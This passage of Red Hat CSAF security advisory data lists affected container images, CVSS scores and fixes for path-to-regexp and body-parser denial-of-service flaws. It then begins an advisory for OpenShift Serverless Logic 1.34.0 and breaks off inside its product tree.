"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2310908", }, ], notes: [ { category: "description", text: "A flaw was found in path-to-regexp package, where it turns path strings into regular expressions. In certain cases, path-to-regexp will output a regular expression that can be exploited to cause poor performance. Because JavaScript is single-threaded and regex matching runs on the main thread, poor performance will block the event loop and lead to a denial of service (DoS).", title: "Vulnerability description", }, { category: "summary", text: "path-to-regexp: Backtracking regular expressions cause ReDoS", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], known_not_affected: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-45296", }, { category: "external", summary: "RHBZ#2310908", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310908", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-45296", url: "https://www.cve.org/CVERecord?id=CVE-2024-45296", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-45296", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-45296", }, { category: "external", summary: "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f", url: "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f", }, { category: "external", summary: "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6", url: "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6", }, { category: "external", summary: "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j", url: "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j", }, ], release_date: "2024-09-09T19:15:13.330000+00:00", remediations: [ { category: "vendor_fix", date: "2024-12-10T01:37:19+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:10906", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5.3, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", version: "3.1", }, products: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "path-to-regexp: Backtracking regular expressions cause ReDoS", }, { cve: "CVE-2024-45590", cwe: { id: "CWE-405", name: "Asymmetric Resource Consumption (Amplification)", }, discovery_date: "2024-09-10T16:20:29.292154+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311171", }, ], notes: [ { category: "description", text: "A flaw was found in body-parser. This vulnerability causes denial of service via a specially crafted payload when the URL encoding is enabled.", title: "Vulnerability description", }, { category: "summary", text: "body-parser: Denial of Service Vulnerability in body-parser", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], known_not_affected: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-45590", }, { category: "external", summary: "RHBZ#2311171", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311171", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-45590", url: "https://www.cve.org/CVERecord?id=CVE-2024-45590", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-45590", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-45590", }, { category: "external", summary: "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce", url: "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce", }, { category: "external", summary: "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7", url: "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7", }, ], release_date: "2024-09-10T16:15:21.083000+00:00", remediations: [ { category: "vendor_fix", date: "2024-12-10T01:37:19+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:10906", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "body-parser: Denial of Service Vulnerability in body-parser", }, ], }
rhsa-2024:8023
Vulnerability from csaf_redhat
Published
2024-10-14 00:59
Modified
2025-04-10 00:21
Summary
Red Hat Security Advisory: Release of OpenShift Serverless Logic 1.34.0 security update & enhancements
Notes
Topic
Release of OpenShift Serverless Logic 1.34.0
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
This release includes security, bug fixes, and enhancements.
Security Fix(es):
* axios: axios: Server-Side Request Forgery (CVE-2024-39338)
* express: Improper Input Handling in Express Redirects (CVE-2024-43796)
* io.vertx/vertx-grpc-client: Vertx gRPC server does not limit the maximum message size (CVE-2024-8391)
* io.vertx/vertx-grpc-server: Vertx gRPC server does not limit the maximum message size (CVE-2024-8391)
* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)
* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)
* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)
For more details about the security issues, including the impact, a CVSS score, acknowledgements, and other related information, refer to the CVE pages listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Important", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Release of OpenShift Serverless Logic 1.34.0\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", title: "Topic", }, { category: "general", text: "This release includes security, bug fixes, and enhancements.\n\nSecurity Fix(es):\n\n* axios: axios: Server-Side Request Forgery (CVE-2024-39338)\n\n* express: Improper Input Handling in Express Redirects (CVE-2024-43796)\n\n* io.vertx/vertx-grpc-client: Vertx gRPC server does not limit the maximum message size (CVE-2024-8391)\n\n* io.vertx/vertx-grpc-server: Vertx gRPC server does not limit the maximum message size (CVE-2024-8391)\n\n* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)\n\n* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)\n\n* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)\n\nFor more details about the security issues, including the impact, a CVSS score, acknowledgements, and other related information, refer to the CVE pages listed in the References section.", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2024:8023", url: "https://access.redhat.com/errata/RHSA-2024:8023", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#important", url: "https://access.redhat.com/security/updates/classification/#important", }, { category: "external", summary: "2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "2309758", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2309758", }, { category: "external", summary: "2311152", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311152", }, { category: "external", summary: "2311153", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311153", }, { category: "external", summary: "2311154", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311154", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8023.json", }, ], title: "Red Hat Security Advisory: Release of OpenShift Serverless Logic 1.34.0 security update & enhancements", tracking: { current_release_date: "2025-04-10T00:21:57+00:00", generator: { date: "2025-04-10T00:21:57+00:00", engine: { name: "Red Hat SDEngine", version: "4.4.2", }, }, id: "RHSA-2024:8023", initial_release_date: "2024-10-14T00:59:58+00:00", revision_history: [ { date: "2024-10-14T00:59:58+00:00", number: "1", summary: "Initial version", }, { date: "2024-10-14T00:59:58+00:00", number: "2", summary: "Last updated version", }, { date: "2025-04-10T00:21:57+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "8Base-Openshift-Serverless-1.34", product: { name: "8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34", product_identification_helper: { cpe: "cpe:/a:redhat:openshift_serverless:1.34::el8", }, }, }, ], category: "product_family", name: "Red Hat OpenShift Serverless", }, { branches: [ { category: "product_version", name: "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", product: { name: "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", product_id: "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", product_identification_helper: { purl: "pkg:oci/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2?arch=amd64&repository_url=registry.redhat.io/openshift-serverless-1/logic-data-index-ephemeral-rhel8&tag=1.34.0-6", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", product: { name: "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", product_id: "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", product_identification_helper: { purl: "pkg:oci/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03?arch=amd64&repository_url=registry.redhat.io/openshift-serverless-1/logic-data-index-postgresql-rhel8&tag=1.34.0-6", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", product: { name: "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", product_id: "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", product_identification_helper: { purl: "pkg:oci/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1?arch=amd64&repository_url=registry.redhat.io/openshift-serverless-1/logic-jobs-service-ephemeral-rhel8&tag=1.34.0-5", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", product: { name: "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", product_id: "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", product_identification_helper: { purl: "pkg:oci/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe?arch=amd64&repository_url=registry.redhat.io/openshift-serverless-1/logic-jobs-service-postgresql-rhel8&tag=1.34.0-6", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", product: { name: "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", product_id: "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", product_identification_helper: { purl: "pkg:oci/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47?arch=amd64&repository_url=registry.redhat.io/openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8&tag=1.34.0-2", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", product: { name: "openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", product_id: "openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", product_identification_helper: { purl: "pkg:oci/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442?arch=amd64&repository_url=registry.redhat.io/openshift-serverless-1/logic-management-console-rhel8&tag=1.34.0-5", }, }, }, { category: "product_version", name: 